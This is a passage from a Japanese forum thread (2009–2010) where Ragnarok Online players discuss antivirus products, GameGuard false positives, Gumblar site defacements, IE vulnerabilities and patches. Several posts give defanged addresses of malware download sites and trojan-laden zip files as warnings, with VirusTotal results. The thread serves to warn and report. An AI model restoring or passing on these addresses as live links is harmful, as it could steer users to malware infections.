ttp://jvnrss.ise.chuo-u.ac.jp/csn/index.cgi?p=CNNIC%A4%CB%A4%E8%A4%EB%2Ecn%A5%C9%A5%E1%A5%A4%A5%F3%C5%D0%CF%BF%BF%B3%BA%BA%A4%CE%B8%AB%C4%BE%A4%B7 <> (○口○*)さん<>sage<>09/12/17 00:21 ID:EU2QIdHt0<> うpロダ爆撃もあるからまだ危ない <> (○口○*)さん<>sage<>09/12/17 00:22 ID:g0ZBH5hd0<> そもそも登録してすぐ使えるサービスと、トンネルがある以上は… <> (○口○*)さん<>sage<>09/12/19 06:26 ID:JFb7mcy40<> RO自体のセキュリティの問題では無いんだけど、nProが更新されてから
(クラ起動時krへアクセスするようになってから)IEやFireFoxの調子がどうも悪い
RO起動中にブラウザ使うと時々何処のページも白紙で表示される。
症状出た後RO終了させると普通にサイト表示されるようになる。監視されるようになったのか? <> (○口○*)さん<>sage<>09/12/19 15:00 ID:HmzHezSk0<> Atomだと起動がかなり重くなったね
前からだけどRO起動してるときだとペンタブも使えなくなることもある <> (○口○*)さん<>sage<>09/12/19 15:15 ID:UFuuhsSP0<> マウスに干渉してるから、ペンタブも干渉しててもおかしくないな。
ブラウザに関しては、RO起動時中クッキー保存すらちゃんとされなくなってる。 <> (○口○*)さん<>sage<>09/12/21 14:12 ID:NoTnr+Mi0<> 現実的環境下のウイルス対策ソフト比較、AV-Comparativesが実施
http://internet.watch.impress.co.jp/docs/news/20091221_338315.html

> テストは、2009年11月16日に開始され、11月26日に終了。4人の人員が1日12時間にわたって
>テストを行ったという。なお、このテストでは、マルウェアが侵入する経路としてWebのみを考慮しており、
>その他の重要な経路であるメールやインスタントメッセンジャー、P2P、USBなどは考慮に入れていない。

なかなか面白い実験だな。 <> (○口○*)さん<>sage<>09/12/21 16:39 ID:c7CF66IH0<> IPアドレス、国内売買解禁へ
ttp://www.yomiuri.co.jp/net/news/20091221-OYT8T00875.htm

>国内に続き、海外事業者との取引もいずれ認める方針。

中華の事が真っ先に浮かんだ俺は、多分正常、と思いたい…… <> (○口○*)さん<><>09/12/22 14:01 ID:xtgC4JmK0<> 現在ニコ動画のランキングに上がっていたトロイの木馬が仕込んである
動画を踏んでしまったのですがavast!が遮断してくれたのですが
現在スキャンも行っておりますが検出されなかったら安心してよいのでしょうか? <> (○口○*)さん<>sage<>09/12/22 14:05 ID:HEDDEa5t0<> >>277
少し前からavast!がニコ動のflvやmp4を一部のトロイと語検出する問題がある。
基本的に他のオンラインスキャナでチェックしてみて大丈夫だったら多分問題ないかと。

それでも心配だったらクリーンインストール汁。
ついでにトロイが検出されなかったらavast!にちゃんと誤検出じゃなないかって送っておいてあげてね。 <> (○口○*)さん<>sage<>09/12/23 11:40 ID:oz1VZXWc0<> JR東日本、HP改ざんされ一部停止
ttp://news.tbs.co.jp/newseye/tbs_newseye4315368.html <> (○口○*)さん<>sage<>09/12/24 00:51 ID:eF+5qV2l0<> ウィルスの種類:「Gumblar」亜種
ttp://www.jreast.co.jp/apology/20091223_restart.html <> (○口○*)さん<>sage<>09/12/24 02:27 ID:H7lm/Evi0<> 今更気付いたけど
> (2009/12/20) お知らせ: SCOの機能の一部は、今後aguseで実現される予定です
だそうです <> (○口○*)さん<>sage<>09/12/24 03:02 ID:vYvUtfKP0<> >279はもう見れないね。以下はITmedia NEWSより。
JR東のサイト内検索窓に改ざん 運用停止
ttp://www.itmedia.co.jp/news/articles/0912/23/news004.html
JR東のサイトが改ざん ユーザーにGENOウイルス感染の恐れ
ttp://www.itmedia.co.jp/news/articles/0912/23/news005.html
JR東日本のお詫び告知
ttp://sorry.jreast.co.jp/ <> (○口○*)さん<>sage<>09/12/24 15:13 ID:bVFUi8q30<> 最も軽いセキュリティ対策ソフトは? パフォーマンス比較結果公開
http://internet.watch.impress.co.jp/docs/news/20091224_339273.html

やはり、体感通り、Aviraは軽いのだな。カスペよりESETが低いのはちょっと意外だった。 <> (○口○*)さん<>sage<>09/12/24 15:16 ID:Ai6A/UpQ0<> カスペって今、巨大ファイルをコピーするとあほみたいに遅くなる問題は
解決済みなのかな? <> (○口○*)さん<>sage<>09/12/24 15:40 ID:sXWNcKJS0<> 評価環境はXPか。
Vista以降なら、LPIOを上手く使っているかどうかでまた結果が違ってくるかもしれないけれど。 <> (○口○*)さん<><>09/12/26 17:15 ID:aacsQSYN0<> さっき限りなく臭いのを踏んでしまったのだが
aguseで調べると偽装URLからrarファイルに飛ばされるっぽかった

このファイル落とさない限りセーフなのか? <> (○口○*)さん<>sage<>09/12/26 17:26 ID:LRmkSbO/0<> 俺カスペからESETにしたけど、相当軽くなったよ。
ていうかカスペが全てに於いてクソ重い。
特にネット見るのだけでもカスペの後にESETしたら、こんな快適だったのかと体感で凄くわかるぐらい。
ROとかのログイン周りとか起動も速くなった。
OS起動時間も全然違う。
正直その調査あまりあてにならなそう。

実際カスペ使ってるなら、ESETに変えてみれば分かる。
カスペ・バスター・GDATA・ESET・Avira・AVG・avastを試したけど軽さで言うなら
Avira・ESETが重さわからないぐらいになって、AVG・avastがちょっと影響あるぐらい。
次にバスターが重く、カスペとGDATAは鈍重。 <> (○口○*)さん<>sage<>09/12/26 18:02 ID:Sl0s4wbC0<> セキュ板に帰れよ <> (○口○*)さん<>sage<>09/12/26 18:18 ID:T2UFTT+t0<> 設定も書かずに重さだけ言ってもなー <> (○口○*)さん<>sage<>09/12/26 20:29 ID:A6pzoiy20<> 軽くてもすりぬけとか誤検知とか新種への対応速度とかがなぁ… <> (○口○*)さん<>sage<>09/12/27 01:17 ID:B5wzhs8F0<> >>286
わかりません

>>287
社員ってことにしとく <> (○口○*)さん<>sage<>09/12/27 21:53 ID:70JRhp9q0<> まぁカスペが重いのは事実だがな
更新日が近づくにつれ、毎日更新しろ更新しろうっさいダイアログが出てくるのがうざかったな <> (○口○*)さん<>sage<>09/12/28 10:35 ID:2/HDKw0i0<> セキュ板に帰れよ <> (○口○*)さん<>sage<>09/12/29 17:16 ID:fW/dwHKz0<> ここにきてまたしても福建中華が動き出した。

個人FC2ブログのっとりIFRAMEを注入、ハニーポット状態の赤石掲示板にリンク投下。
まさに「日本人はすぐに忘れる」とばかりの攻撃だ。

dobu33■blog7■fc2■com/

再び仕込み場所がブログに最下部に移動。
IFRAMEのリンクが4gamerankingからblog86fc2に変わったのが目新しい。

やっぱり連中に一度目をつけられたら対策しない限り延々攻撃され続けるってことだね。
FC2ブログ持ちは大変だ。
油断大敵、年末年始は特に気をつけてくれよな! <> (○口○*)さん<>sage<>09/12/29 17:24 ID:YMeLbDht0<> >>294
運営とか管理者に言っても鈍いから
こういう所に報告した方が良いかも
ttp://www.google.com/safebrowsing/report_badware/ <> (○口○*)さん<>sage<>09/12/29 17:49 ID:fW/dwHKz0<> >>295
報告しておいた、ありがとう。 <> (○口○*)さん<>sage<>09/12/30 11:58 ID:Pp6Toq3W0<> >>294
消えた <> (○口○*)さん<>sage<>09/12/31 08:05 ID:czVS/9Fy0<> >>297
ブログ管理者が消したみたいだね。
FC2が消せば”このページの表示は許可されていません”だから。

放置ブログじゃなかったのが不幸中の幸いってやつか。

個人ブログはもちろんのこと
昨年のエキサイトブログTOPみたいに年末年始三が日にどっか大型サイト改竄来そうだな。
サポートは休みだから対応後手後手で被害多発させやすいからな。 <> (○口○*)さん<>sage<>10/01/01 21:42 ID:G54aM4sZ0<> 新年早々、福建省からのプレゼント

>【RO】HWソロ マヌク02 【異世界】
>knowervber■f19■zgsj■net/admin33333/

>REMOTE_ADDR: 58.22.84.104

開くと00225.zipが落ちてくる。
中身はそのまま00225.exe。

http://www.virustotal.com/analisis/a212dad2d10c5950c4c8366e6df4b2adf0cf953d66710d2c5dad3ecdc8004217-1262349213
>Result: 18/40 (45%)

カスペ/AVG/Avast等、大半の有名処がスルーしたけどMcAfeeが引っかけた。
>McAfee 5848 2009.12.31 PWS-Gamania.gen.e

カスペに提出してきます。 <> (○口○*)さん<>sage<>10/01/01 23:36 ID:oZyH8CvW0<> >>299
同一内容で当方にも襲来。IPだけ違う。
IP : 219.117.219.210 (public-anonymous-nat.packetix.net)
BBQで焼かれ炭。 <> (○口○*)さん<>sage<>10/01/02 00:17 ID:fDXON7JC0<> 2010って相変わらずnPro衝突を起こす糞セキュソフトなの?
2009のままだが、改善されないようなら別のに乗り換えようかな <> (○口○*)さん<>sage<>10/01/02 00:18 ID:fDXON7JC0<> ああ、カスペな <> (○口○*)さん<>sage<>10/01/02 00:33 ID:gkq8NqzK0<> カスペ2010で色々不具合報告はあるけど最も非が有るのは韓国のマイナーアプリである
nProのRootKitともみなせるような極めてタコな設計。だからカスペをせめるのはお門違い
だと思うんだが。ユーザーならカスペに対応を願うような報告はしたの?

問題がどの辺にあるのか認識できる知識がないのなら大人しくそのまま使うか
自己責任で新しいソフトを試したらいいさ。 <> (○口○*)さん<>sage<>10/01/02 00:40 ID:ph6IwysA0<> nProについてはM$からもrootkitと看做されているし、Kasperskyは設定でどうにか出来るソフトだから
それだけの知識が無いなら他のセキュリティソフトに乗り換えた方が無難だろう。 <> (○口○*)さん<>sage<>10/01/02 00:53 ID:+WeVpHeH0<> 誤検知も不具合もあるうちが花じゃないか?
nProに偽装したウィルスでも出てきてみろ、総スルーで好き勝手やられたらたまったもんじゃない <> (○口○*)さん<>sage<>10/01/02 07:00 ID:eRzId2Sc0<> ROを基準にして糞とか言うのは…… <> (○口○*)さん<>sage<>10/01/02 17:54 ID:P6GxMZge0<> ROが人生なんだからスルーしてやれ <> (○口○*)さん<>sage<>10/01/03 21:32 ID:3ZDWTwQM0<> nProやめて韓国のと同じものにすることはできんのかねー
大人の事情なんだろうな <> (○口○*)さん<>sage<>10/01/04 22:38 ID:oOTJwvZ50<> 韓国は国民番号制だから多少マシなのであって(それですらひどいけど)
nProのを韓国と同じにしたら実は劣化するなんて可能性もありえるぞ? <> (○口○*)さん<>sage<>10/01/04 22:57 ID:l3e9EL4c0<> やー韓国はアンラボの使ってるんだから、それはないでしょ <> (○口○*)さん<>sage<>10/01/05 18:56 ID:eJnTJSUL0<> ホンダとか大手企業がウイルス感染とか新聞に書いてるけど大丈夫かよ・・・
まぁ癌なんて誰も相手にせんだろうけどさ <> (○口○*)さん<>sage<>10/01/05 19:56 ID:0CNnX4JJ0<> 感染したのは去年の話だけどな

ついでに無差別攻撃だからどんなにマイナーでも弱点があればやられる <> (○口○*)さん<>sage<>10/01/05 20:07 ID:WDXBODjf0<> 新型ウイルス「ガンブラー」、ホンダ、ラジオ関西など4社HP感染
ttp://osaka.yomiuri.co.jp/news/20100105-OYO1T00829.htm?from=top

これかな <> (○口○*)さん<>sage<>10/01/06 07:11 ID:IWhEyAw80<> 改竄ブログ2件。
kirakunisusumou■blog63■fc2■com
totsuzennshi■blog117■fc2■com
仕込まれているリンク先は>>294と同じ。 <> (○口○*)さん<><>10/01/06 14:36 ID:XPhUxZR90<> さっき手動でウイルスバスターのパッチ更新したら1200Kぐらい落としてきたけど
2〜3時間前にもやったんだけどその時は何も落としてこなかったから
>>313の件か他に何かあったのかな <> (○口○*)さん<>sage<>10/01/06 17:46 ID:+jP6FTVq0<> コンピュータウイルス・不正アクセスの届出状況[12月分および2009年年間]について
ttp://www.ipa.go.jp/security/txt/2010/01outline.html <> (○口○*)さん<>sage<>10/01/06 23:11 ID:IWhEyAw80<> ガンブラー:被害急増 有害サイトに誘導の新種ウイルス
ttp://mainichi.jp/select/biz/it/news/20100107k0000m040109000c.html?inb=fi

有名企業HPの改竄ニュースが続いて、あちこちで記事に取り上げられるる中で
検知できなくて使えねーとかは思われたくないってのもありそうな予感。 <> (○口○*)さん<>age<>10/01/08 00:05 ID:ixxPiiTO0<> 「Ameba」のセキュリティ啓発キャンペーン「ノートン警察」で配布していたブログパーツが不正アクセスで改ざんされ、閲覧したユーザーがトロイの木馬型ウイルスに感染した恐れがある。 <> (○口○*)さん<>sage<>10/01/08 00:08 ID:VaP1chc70<> ソースなし? <> (○口○*)さん<>sage<>10/01/08 00:15 ID:3Fm2mdA/0<> これだな
ttp://www.itmedia.co.jp/news/articles/1001/07/news092.html <> (○口○*)さん<>sage<>10/01/08 01:22 ID:pjom3P9F0<> なんて嫌味な不正改竄だ <> (○口○*)さん<>sage<>10/01/08 07:45 ID:7g5xd2CX0<> ブログパーツとか重くなるだけの要素だけどな <> (○口○*)さん<>sage<>10/01/08 18:56 ID:9V5RkPfi0<> Amebaならしかたない <> (○口○*)さん<>sage<>10/01/09 01:27 ID:kPuibCTi0<> 多分改竄じゃなく新規?の罠ブログ
rsyuuei77■blog128■fc2■com

リンクされてる先は4gameranking、blog86fc2と、
count3■51yes■com(危険とは判定されず@aguse&gred)
↑はアニメーションカーソル問題の頃からの悪質ドメインらしい <> (○口○*)さん<>sage<>10/01/09 02:03 ID:jsEn2lsL0<> 下の奴はよく見る彼らのアクセス解析。 <> (○口○*)さん<>sage<>10/01/10 10:12 ID:EfXQ5eQk0<> 福建一味が中華ダウンローダーへのリンクを貼っていつものハニーポット状態の赤石掲示板の北米スレで誘導していた。

こんな文で
今回はMoonLight Engineの設定方法です。 他はおいおい紹介していきます。
(誘導先)

よそのブログ文をパクったようで、上の文を検索したら中華がパクったものはすぐに出た。

確認できる爆撃地点は北米スレだけのようなので様子見なのか?
誘導先 : www■vdisk■cn/down/index/3995840A7995

ファイル登録日と誘導書き込みは1/9。
中身は殆どのソフトで検出可能。
http://www.virustotal.com/analisis/367ce2e1f7aa4d1b733c330903f5b03eb57b1d11a0a326788f0cca0befff369f-1263085062

中華ダウンローダーなど使うこともないだろうからhostsに突っ込んでも問題は無いであろう。 <> (○口○*)さん<>sage<>10/01/10 17:21 ID:8eOFpOtM0<> RO起動しようとしたらシェル設定が変更される為規制しましたってバスターが言ってきたんだが
これは起動しとかない方がいいよな? <> (○口○*)さん<>sage<>10/01/10 17:46 ID:xMe3D0GY0<> >>327
Ragexeがパッチで更新されたらよく出るから大抵は問題ないはず <> (○口○*)さん<>sage<>10/01/10 17:59 ID:XS6fwiot0<> 大抵って、それじゃ本当に安全なのかわからないぞw
バスター使ってないから知らんが、解明しておいた方がいいんじゃ? <> (○口○*)さん<>sage<>10/01/10 18:05 ID:8eOFpOtM0<> >>328
と言い方が悪かった
今までIEでパス入れてRO蔵を起動させると出る事はあったけど
パス入れるIEを起動した時点で出たから安心していいのかなぁと
前者は安全ってのは分かるけど、後者は大丈夫なのかちと気になってな <> (○口○*)さん <>sage<>10/01/11 14:13 ID:HCpr5ELY0<> お聞きしたいのですが
3日前にWin32/Themidaに感染しているとスキャン結果が出ました
RO以外起動していませんがPCを共用している家族がいます
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 大いにあり
【    ツールの使用の有無      】 No
【  ネットカフェの利用の有無    】 No
【     OS    】 Microsoft Windows XP Professional Version 2002 Service Pack 3
【使用ブラウザ 】 (InternetExplorerバージョンはわかりません…
【WindowsUpdateの有無】 1週間以内だと思われます
【 アンチウイルスソフト 】 (AVGInternetSecurity9.0)
【その他のSecurty対策 】 (ありません)
【 ウイルススキャン結果】 (AVGのスキャンでWin32/Themidaに感染しているという報告が3日前から毎日出ます)
【スレログやテンプレを読んだか】 No
【hostsファイルの変更】無
【PeerGuardian2の導入】無
【説明】 特に被害はありませんが駆除したと思ってもまた新しく感染します
ファイアウォールは起動していると出ていますし
AVGの更新もしていますが毎日感染の報告が出るので困っています
同じように使っているけれど、家族と共用していないほうのPCには感染の報告は出ません
感染を止めたいのですが、どうすればいいのかわかりません
それと、Win32/Themidaがどういうウイルスかわからないのですがこれはなにをするウイルスでしょうか
スレチでしたら移動先を教えていただければと思います
よろしくおねがいします <> (○口○*)さん<>sage<>10/01/11 14:20 ID:iYy//dbn0<> >>331
AVGのWin32/Themidaはゲームガードに反応してる
ゲームガードは削除しても復活する
AVGでGameGuardフォルダをスキャンしてWin32/Themidaでるようなら
AVG側の設定でGameGuardをフォルダごと除外設定してもう一度スキャンしてはどうか <> 331<>sage<>10/01/11 14:30 ID:HCpr5ELY0<> >332さん
お早い返答ありがとうございます
GameGuardのフォルダから感染と出ました
復活するものはどうしたらいいのでしょうか
スキャンは試してみます
あと、すみませんがこれは何をするウイルスなのかも
教えてもらえたらと思います
重ね重ねすみません <> (○口○*)さん<>sage<>10/01/11 14:42 ID:iYy//dbn0<> GameGuardから検出なら誤検出
GameGuardフォルダを除外設定しても誤検出を繰り返すようなら
AVGの対応を松しか無いが、nPro(GameGuard)は性質上ウイルス扱いされやすいんで
嫌なら誤検出しない他のアンチウイルスソフトへ乗り換えることになる
当方、AVGユーザーでは無いんでこのくらいしかわかりません <> 331<>sage<>10/01/11 14:51 ID:HCpr5ELY0<> >>334さんありがとうございます
誤検知なのですねありがとうございます
安心しましたw
今、GameGuard以外をスキャンにかけています
これで検出されなかったら解決ですね
本当に>>332さん>>334さん
ありがとうございました <> (○口○*)さん<>sage<>10/01/11 19:07 ID:hHIpgCui0<> カスペ先生がunbel32.dllをTrojan.Win32.Agent.dffbとして削除した
caldixを起動したらdllが再インストールされたが、今度はUnbel32t.exeが
Trojan.Win32.Agent.dffcとして削除された。

誤爆だと思うが念のためフルサーチしてみる。 <> (○口○*)さん<>sage<>10/01/12 23:10 ID:LExGAHNM0<> >>336
dllはちょっと待っててね。
 Hello,
 unbel32.dll
 We are sorry, it is false alarm. It will be fixed as soon as possible. Thank you for your help.
exeは持ってないので知らない。 <> (○口○*)さん<>sage<>10/01/13 07:14 ID:RQL5aJGb0<> AdobeReader9.3.0
WindowsUpdate <> (○口○*)さん<>sage<>10/01/13 09:34 ID:QyfHJ6rD0<> >>338
thx <> (○口○*)さん<>sage<>10/01/13 13:26 ID:CPbD8LbH0<> 相変わらずアップデータは後回しなんだね
もう出たかもしれないけれど <> (○口○*)さん<><>10/01/13 15:55 ID:i1NjDEcu0<> 月例age
緊急 1件
http://www.microsoft.com/japan/technet/security/bulletin/ms10-jan.mspx
ttp://blogs.technet.com/jpsecurity/archive/2010/01/13/3305224.aspx

Win2kユーザーは特に注意。
ttp://pc.nikkeibp.co.jp/article/news/20100113/1022134/
>(1)[MS10-001]Embedded OpenTypeフォントエンジンの脆弱性により、リモートでコードが実行される(972270)
>影響を受けるのは、現在サポート対象となっているすべてのWindows(Windows 2000/XP/Vista/7/Server 2003/Server 2008)。
>ただし、実際に脆弱性を悪用できるのは、Windows 2000のみ。

Adobe Readerは英語サイトにならアップデートが上がっているので、現状ではそちらからどうぞ。
Adobe Reader MUI 9.3 Update - Multiple Languages
ttp://www.adobe.com/support/downloads/product.jsp?product=10&platform=Windows <> (○口○*)さん<>sage<>10/01/13 16:26 ID:CPbD8LbH0<> >英語サイトにならアップデートが上がっている
まあ、普通にアップデータじゃないのをインストールしちゃったけれどね。
手っ取り早いので。 <> (○口○*)さん<>sage<>10/01/13 17:05 ID:vAH9kZht0<> Adobe Reader上からアップデートの確認でインストールできるようにはなってるな <> (○口○*)さん<><>10/01/15 02:25 ID:pjFejzA6O<> アメーバ セキュリティで検索して来ました <> (○口○*)さん<>sage<>10/01/15 02:27 ID:Adz2yH3d0<> そうですか <> (○口○*)さん<>sage<>10/01/15 02:31 ID:Ldgx2cnX0<> アメーバ赤痢かと思った <> (○口○*)さん<>sage<>10/01/15 02:31 ID:Om/Wjqz+0<> Java Runtime Environment 6 Update 18も出てるぜ <> (○口○*)さん<>sage<>10/01/15 02:36 ID:Adz2yH3d0<> SEでない方もでてる? <> (○口○*)さん<>sage<>10/01/15 13:39 ID:SYmwE7680<> Googleへの攻撃にIEのゼロデイ脆弱性、MSがアドバイザリを公開
http://internet.watch.impress.co.jp/docs/news/20100115_342505.html

現状ではDEPを有効にするなどの方法しか、対処方法が無い模様。 <> (○口○*)さん<>sage<>10/01/15 17:43 ID:Iz+Fxz6s0<> 【      気付いた日時          】 (17:16 2010/01/15)
【不審なアドレスのクリックの有無 】 xreaにあるサイトを見た時に触った可能性有 下記参照
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【    ツールの使用の有無      】 No
【  ネットカフェの利用の有無    】 No
【     OS    】 Microsoft Windows XP home edition ver2002 SP3
【使用ブラウザ 】 Opera ver10.10 build 1893
【WindowsUpdateの有無】 自動更新、最後は確かつい数日前
【 アンチウイルスソフト 】 Norton Internet Security 2009 ver16.7.2.11
【その他のSecurty対策 】 無し
【 ウイルススキャン結果】 異常なし
【スレログやテンプレを読んだか】 テンプレはYES、過去ログはNO
【hostsファイルの変更】無 
【PeerGuardian2の導入】有、リネージュ資料室の危険ドメイン参照
【説明】 長々放置していたのもあり、xreaにある自サイト(申し訳ありません、アドレスは勘弁して下さい)を
閉鎖するつもりでサイトにアクセスしたのですが、他サイトへのリンクのページへアクセスした際にPG2が反応、
ログを調べると「www■articlelin■com」を遮断していました。
BSWIKI様の危険ドメインリストに「2010/01/15にIP変動有」とあったのですが、これは当該ドメインが生きており、
ウィルスを散布していると見て良いのでしょうか。
またサイトを閉鎖するに当たってですが、サイトそのものが汚染されているが、web上の管理画面から
閉鎖するのには支障がないものなのか、または以前のデジロウィルス騒動のように管理画面(広告鯖)までも
汚染されており、今は近づかない方が良いものなのか、判断がつきません。

なお、もしスレ違いでしたら移動先を教えて頂けるとありがたいです。
皆様のお知恵をお貸しください。よろしくお願いいたします。 <> 350
◆X6YazhppYE<>sage<>10/01/15 20:01 ID:Iz+Fxz6s0<> 追記します。情報小出しで申し訳ありません。
自分どれだけ焦ってるんだ・・・

上の書き込みの後、自サイトの数ページをAguse.jpで調べましたが
特に怪しげな反応はなし。そして、「Spybot-Search&Destroy」を導入、
PC内をスキャンしましたがこれも異常なし。

また、前述の「ウィルススキャン結果」の項ですが、これは
Kaspersky Online scan@Niftyでの結果です。
Norton先生では完全スキャンしておりませんが、踏んだ時も
反応はありませんでした。

以上、記述忘れ&経過を報告いたします。 <> (○口○*)さん<>sage<>10/01/15 20:23 ID:Ldgx2cnX0<> ブラウザで見ればわかるけど、ドメイン業者の広告になってる。
有害サイトは(ブラックリストされるので使い捨てで)まず延長しないから
1年で切れる。 <> (○口○*)さん<>sage<>10/01/15 21:06 ID:KRU/Gtic0<> ググるとどうやら07〜08辺りにハックに使われてた?っぽいのね <> 350
◆X6YazhppYE<>sage<>10/01/15 22:40 ID:Iz+Fxz6s0<> >>352>>353
当該ドメインをAguseにかけてみました。おねーさんに笑われました。
流し読みした感じ、>>352さんの仰る通りの広告のようです。
1年、という事は当座の被害は考えなくてよさそうですね。

ありがとうございました。
盛大にデリってきます。 <> (○口○*)さん<>sage<>10/01/18 07:12 ID:20K8lcq/0<> 保守 <> (○口○*)さん<>sage<>10/01/18 16:09 ID:uCXHoOnK0<> >349に関連して

中国発のサイバー攻撃に使われたIE脆弱性--エクスプロイトコードが出回る
http://www.yomiuri.co.jp/net/news/cnet/20100118-OYT8T00424.htm

>一方、ドイツの連邦安全保障局は15日、声明を発表し、パッチが公開されるまでは
>IE以外のブラウザを使うよう国民に勧めた。

>標的となった30以上のシリコンバレー企業からソースコードが盗み出されていると、
>同情報筋は述べる。Adobeは被害に合ったことを認め、さらに情報筋によれば
>Yahoo、Symantec、Juniper Networks、Northrop Grumman、 Dow Chemicalも標的になったという。

ご注意あれ <> (○口○*)さん<>sage<>10/01/19 22:36 ID:Mnva786Y0<> 【社会】中国からのオンラインゲームへのアクセスを不正に中継…中国人社長を逮捕
http://tsushima.2ch.net/test/read.cgi/newsplus/1263905706/
>逮捕容疑は昨年7〜10月、国に届けず自宅や会社にサーバーを設置。中国などから
>3万3千回以上、都内のゲーム会社が運営するオンラインゲーム「タワーオブアイオン」への
>アクセスを可能にし、同社の業務を妨害した疑い。

*+*+ 産経ニュース 2010/01/19[21:55:06] +*+*
http://sankei.jp.msn.com/affairs/crime/100119/crm1001192147046-n1.htm

丁度時期的にも、垢ハック祭りと合致しているのは偶然ではなさそうだね。 <> (○口○*)さん<>sage<>10/01/19 23:04 ID:GWi16Onc0<> 電気通信事業法なのか、珍しいな <> (○口○*)さん<>sage<>10/01/19 23:59 ID:OlKaB2hz0<> 昨日のこれとは別物みたいだね。

無届けでサーバー運営の中国人容疑者を逮捕 神奈川県警
ttp://sankei.jp.msn.com/affairs/crime/100118/crm1001181847019-n1.htm <> (○口○*)さん<>sage<>10/01/20 11:07 ID:SC0uZ14t0<> MicrosoftがIEの臨時パッチを公開へ、脆弱性問題に対応
ttp://www.itmedia.co.jp/news/articles/1001/20/news021.html <> (○口○*)さん<>sage<>10/01/20 11:56 ID:ToSNcsTv0<> Silverlightの更新がきてた <> (○口○*)さん<>sage<>10/01/20 15:14 ID:RSZDIN5FO<> ROスキンのロダ見てたらzipの中にトロイが仕込んであった
DL前にカスペが気づいてはじいたからDLはしてないが…

念のためスキャンしてくる <> (○口○*)さん<>sage<>10/01/20 17:48 ID:C3o3sXPa0<> うpろだで誰が作ったかわからないもの落とすとか勇者だな <> (○口○*)さん<>sage<>10/01/20 18:05 ID:3yO1q8Qz0<> >DL前にカスペが気づいて
それDLしてる(隔離or削除済みと思うが) <> (○口○*)さん<>sage<>10/01/20 18:22 ID:GmZ+kqUG0<> ShockwavePlayer 11.5.6.606
Silverlight 3.0.50106.0

QuickTime7.6.5 穴開き中
ttp://isc.sans.org/diary.html?storyid=8008 <> (○口○*)さん<>sage<>10/01/20 18:46 ID:5uruELS50<> >>362
ドットを■に置き換えてファイルのアドレスPlz <> (○口○*)さん<>sage<>10/01/20 20:23 ID:RSZDIN5FO<> ホントなんで踏んだんだろ…しばらくROから離れてたから気が緩んでたよ
アドレスは

http://roskin■s103■xrea■com/upload/skin/120■zip <> (○口○*)さん<>sage<>10/01/20 21:07 ID:UGGzi1s10<> それに限らず、そのロダは危険物アップされ放題っつーか。
中身phpスクリプトなのもあるし。 <> (○口○*)さん<>sage<>10/01/20 21:25 ID:rxRQlDUy0<> 管理者不在のロダは危険だよな。
ウイルス関係だけでなく、政治や宗教、エロ絡みに飛び火するリスクすらあり得る。 <> (○口○*)さん<>sage<>10/01/20 22:14 ID:RSZDIN5FO<> 12月に再インスコしたばっかだったのに…orz
また再インスコのフラグを立ててしまった <> (○口○*)さん<>sage<>10/01/20 22:39 ID:5uruELS50<> >>367
Trojan.Win32.Pincav.f(カスペ検出名)

zip(30/41)
ttp://www.virustotal.com/analisis/3f07ab2f53cdb2f697c057330157c41c570df178fa457a0c9aace75c482e8899-1253005589

中身 s200919599mpea.exe(33/40)
ttp://www.virustotal.com/analisis/226a4f21de7bcc8b4dbe19b12535d0a2a81e2617fbe45f1efcdb8f44270dcc42-1257582717

古めの検出結果で、最新じゃないけど、再チェックさせる必要なさそうだ。 <> (○口○*)さん<>sage<>10/01/20 23:45 ID:ksoWY1qz0<> >>369 管理放棄ロダ

テロリストにファイルをupされて面倒なことに…って話も聞いたことがあったような。怖い怖い。 <> (○口○*)さん<>sage<>10/01/21 00:35 ID:dW8yiHPd0<> 管理してるうpろだでも逮捕されるこのご時世
放置できるのがすごい <> (○口○*)さん<>sage<>10/01/21 00:38 ID:9paBcvRg0<> ノーガード戦法 <> (○口○*)さん<>sage<>10/01/21 00:42 ID:jhJhQil5O<> どうもお騒がせしましたm(__)m
とりあえず駆除はして、再インスコしようか悩み中 <> (○口○*)さん<>sage<>10/01/21 07:16 ID:u/sUBb+g0<> どうせなら再インスコついでに、EASEUS Todo BackupとかDriveImage XMLの導入マジオヌヌメ <> (○口○*)さん<>sage<>10/01/21 11:14 ID:jhJhQil5O<> 最近再インスコしたからこそ、やるなら今のうちって考え方もあるか…
やらないで後から漏れててウワァーなるのも嫌だしなぁ

帰ったらそのオススメの導入も考えてみまっする <> (○口○*)さん<>sage<>10/01/21 13:03 ID:En3ohrgW0<> ワンタイムパスワード(ベータ版)、auでも実装
http://www.ragnarokonline.jp/news/information/notice/item/13370 <> (○口○*)さん<>sage<>10/01/21 14:13 ID:u/sUBb+g0<> >>360の続報、リリースは01/22になる模様。
マイクロソフト セキュリティ情報の事前通知 - 2010 年 1 月 (定例外)
ttp://www.microsoft.com/japan/technet/security/bulletin/ms10-jan-ans.mspx <> (○口○*)さん<>sage<>10/01/21 19:05 ID:dW8yiHPd0<> RO実況について語るスレ
ttp://pc12.2ch.net/test/read.cgi/streaming/1259462047/56
にこんなのが

56 名前:AS[] 投稿日:2010/01/21(木) 17:47:11 ID:v80+Jo6N0
ROratorio(RO計算機) 総合計算機
http://loda■jp/fg6543242fs/?id=1■zip

日本のレンタルうpろだ借りてるようで
http://www.virustotal.com/jp/analisis/6b2ad162933a007d075972e8693ef5298dce35bf3391061dfde3d6d78e39ae60-1264067890 <> (○口○*)さん<>sage<>10/01/21 19:11 ID:XEljE4Ut0<> レンタルろだは腐るほどあるから、突撃されたり偽装ろだ作られたり
あちこち引っかき回されると根本的な手の施しようがないな <> (○口○*)さん<>sage<>10/01/21 19:46 ID:u/sUBb+g0<> とりあえず、loda.jpには通報完了。あとは凍結待ち。

各種問い合わせ→ ttp://loda.jp/mail <> (○口○*)さん<>sage<>10/01/21 20:17 ID:MtxVVL/y0<> >>380
結構スルーしてるね <> (○口○*)さん<>sage<>10/01/22 07:13 ID:01nHVa8w0<> マイクロソフト セキュリティ情報 MS10-002 - 緊急
Internet Explorer 用の累積的なセキュリティ更新プログラム (978207)
ttp://www.microsoft.com/japan/technet/security/bulletin/ms10-002.mspx <> (○口○*)さん<>sage<>10/01/22 20:04 ID:+DreDW9D0<> PeerGuardian2 for Windows β6b 日本語第2版 2000・XP・2003用をDLしようと思ったのですが、落とせません
クリックして飛ばされる先は白紙です
なぜでしょうか <> (○口○*)さん<>sage<>10/01/22 20:10 ID:fBn1uEX20<> エスパー様が必要なレベルだから <> (○口○*)さん<>sage<>10/01/22 20:15 ID:zpkbv5850<> >>385
